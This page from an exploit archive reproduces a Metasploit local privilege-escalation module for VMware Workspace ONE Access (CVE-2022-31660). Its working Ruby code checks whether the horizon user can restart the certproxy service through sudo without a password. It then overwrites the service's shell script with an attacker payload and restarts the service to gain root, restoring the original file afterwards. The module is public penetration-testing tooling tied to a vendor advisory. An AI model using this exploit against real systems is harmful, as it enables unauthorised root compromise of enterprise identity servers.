VMware Workspace ONE Access Privilege Escalation

2022.08.07
Risk: High
Local: Yes
Remote: No
CWE: CWE-264

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Post::Unix TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze def initialize(info = {}) super( update_info( info, { 'Name' => 'VMware Workspace ONE Access CVE-2022-31660', 'Description' => %q{ VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password. }, 'License' => MSF_LICENSE, 'Author' => [ 'Spencer McIntyre' ], 'Platform' => [ 'linux', 'unix' ], 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [ [ 'Automatic', {} ], ], 'DefaultOptions' => { 'PrependFork' => true, 'MeterpreterTryToFork' => true }, 'Privileged' => true, 'DefaultTarget' => 0, 'References' => [ [ 'CVE', '2022-31660' ], [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ] ], 'DisclosureDate' => '2022-08-02', 'Notes' => { # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service # is disabled by default though. 'Stability' => [CRASH_SERVICE_DOWN], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] } } ) ) end def certproxy_service # this script's location depends on the version, so find it. return @certproxy_service if @certproxy_service @certproxy_service = [ '/usr/local/horizon/scripts/certproxyService.sh', '/opt/vmware/certproxy/bin/certproxyService.sh' ].find { |path| file?(path) } vprint_status("Found service control script at: #{@certproxy_service}") if @certproxy_service @certproxy_service end def sudo(arguments) cmd_exec("sudo --non-interactive #{arguments}") end def check unless whoami == 'horizon' return CheckCode::Safe('Not running as the horizon user.') end token = Rex::Text.rand_text_alpha(10) unless sudo("--list '#{certproxy_service}' && echo #{token}").include?(token) return CheckCode::Safe('Cannot invoke the service control script with sudo.') end unless writable?(TARGET_FILE) return CheckCode::Safe('Cannot write to the service file.') end CheckCode::Appears end def exploit # backup the original permissions and contents print_status('Backing up the original file...') @backup = { stat: stat(TARGET_FILE), contents: read_file(TARGET_FILE) } if payload.arch.first == ARCH_CMD payload_data = "#!/bin/bash\n#{payload.encoded}" else payload_data = generate_payload_exe end upload_and_chmodx(TARGET_FILE, payload_data) print_status('Triggering the payload...') sudo("--background #{certproxy_service} restart") end def cleanup return unless @backup print_status('Restoring file contents...') file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it write_file(TARGET_FILE, @backup[:contents]) print_status('Restoring file permissions...') chmod(TARGET_FILE, @backup[:stat].mode & 0o777) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top